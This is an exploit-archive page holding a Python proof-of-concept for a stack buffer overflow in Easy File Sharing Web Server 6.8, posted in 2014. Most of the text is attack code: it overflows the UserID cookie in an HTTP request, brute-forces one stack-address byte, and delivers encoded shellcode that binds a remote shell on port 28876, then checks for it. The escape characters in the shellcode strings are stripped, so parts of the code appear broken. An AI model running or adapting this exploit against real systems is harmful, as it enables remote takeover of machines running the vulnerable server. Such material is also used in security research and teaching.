Home / exploits Easy File Sharing Web Server 6.8 Buffer Overflow
Posted on 15 May 2014
# Exploit Title: Easy File Sharing Web Server 6.8 stack buffer overflow # Date: 10 May 2014 # Exploit Author: superkojiman - http://www.techorganic.com # Vendor Homepage: http://www.efssoft.com # Software Link: http://www.sharing-file.com/efssetup.exe # Version: 6.8 # Tested on: English version of Windows XP Professional SP2 and SP3 # # Description: # By setting UserID in the cookie to a long string, we can overwrite EDX which # allows us to control execution flow when the following instruction is # executed: # # 0x0045C8C2: CALL DWORD PTR DS:[EDX+28] # # We can point EDX+28 to a location in the stack containing a pointer to # instructions we want to execute. This pointer can be placed at 0x01??6969. # Under Windows XP Professional SP2/SP3, the first, third, and fourth bytes # in the address are always the same. The second byte is random so we need # to bruteforce it. This takes at most 255 tries and the server doesn't crash # so we can keep trying. # # The pointer placed at 0x01??6969 is a pointer to a CALL ESI. ESI points to # a small space in our payload. We fill this small space with instructions to # jump further down the stack where our shellcode is stored. # # Tested with Easy File Sharing Webserver installed in the default location at # C:EFS SoftwareEasy File Sharing Web Server # import socket import struct import time import sys target = "192.168.1.140" port = 80 # Shellcode from https://code.google.com/p/w32-bind-ngs-shellcode/ # Binds a shell on port 28876 # msfencode -b 'x00x20' -i w32-bind-ngs-shellcode.bin # [*] x86/shikata_ga_nai succeeded with size 241 (iteration=1) shellcode = ( "xbbxa1x68xdex7cxddxc0xd9x74x24xf4x58x33xc9" + "xb1x36x31x58x14x83xe8xfcx03x58x10x43x9dxef" + "xb5xe7xd5x61x76x6cx9fx8dxfdx04x7cx05x6fxe0" + "xf7x67x50x7bx31xa0xdfx63x4bx23x8exfbx81x9c" + "x02xc9x8dx44x33x5ax3dxe1x0cx2bxc8x69xfbxd5" + "x7ex8axd5xd5xa8x41xacx02x7cxaax05x8dxd0x0c" + "x0bx5ax82x0dx44x48x80x5dx10xcdxf4xeax7axf0" + "x7cxecx69x81x36xcex6cx7cx9ex3fxbdx3cx94x74" + "xd0xc1x44xc0xe4x6dxacx58x21xa9xf1xebx44xc6" + "x30x2bxd2xc3x1bxb8x57x37xa5x57x68x80xb1xf6" + "xfcxa5xa5xf9xebxb0x3exfaxefx53x15x7dxd1x5a" + "x1fx76xa3x02xdbxd5x44x6axb4x4cx3axb4x48x1a" + "x8ax96x03x1bx3cx8bxa3x34x28x52x74x4bxacxdb" + "xb8xd9x43xb4x13x48x9bxeaxe9xb3x17xf2xc3xe1" + "x8ax6ax47x6bx4fx4ax0ax0fxabxb2xbfx5bx18x04" + "xf8x72x5exdcx80xb9x45x8bxdcx93xd7xf5xa6xfc" + "xd0xaex7ax51xb6x02x84x03xdcx29x3cx50xf5xe7" + "x3ex57xf9" ) print "[+] We're guessing an address on the stack. It will be a few minutes..." for i in xrange(1,255): n = "" if i < 16: n = "0" + hex(i)[-1] else: n = hex(i)[2:] # craft the value of EDX that will be used in CALL DWORD PTR DS:[EDX+28] guess = "0x01" + n + "6940" sys.stdout.write("="); payload = "A"*64 # padding payload += "x81xeex70xffxffxff" # SUB ESI,-90 payload += "xffxe6" # JMP ESI payload += "A"*8 # padding payload += struct.pack("<I", int(guess, 16)) # overwrite EDX with # pointer to CALL ESI payload += "C"*108 # padding payload += struct.pack("<I", 0x10023701) # pointer to CALL ESI payload += "x90"*20 # NOP sled payload += shellcode # calc.exe # craft the request buf = ( "GET /vfolder.ghp HTTP/1.1 " "User-Agent: Mozilla/4.0 " "Host:" + target + ":" + str(port) + " " "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 " "Accept-Language: en-us " "Accept-Encoding: gzip, deflate " "Referer: http://" + target + "/ " "Cookie: SESSIONID=6771; UserID=" + payload + "; PassWD=; " "Conection: Keep-Alive " ) # send the request and payload to the server s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s1.connect((target, port)) s1.send(buf) s1.close() try: # check if we guessed the correct address by connecting to port 28876 s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s2.connect((target, 28876)) s2.close() print " [+] Success! A shell is waiting on port 28876!" break except Exception,e: pass
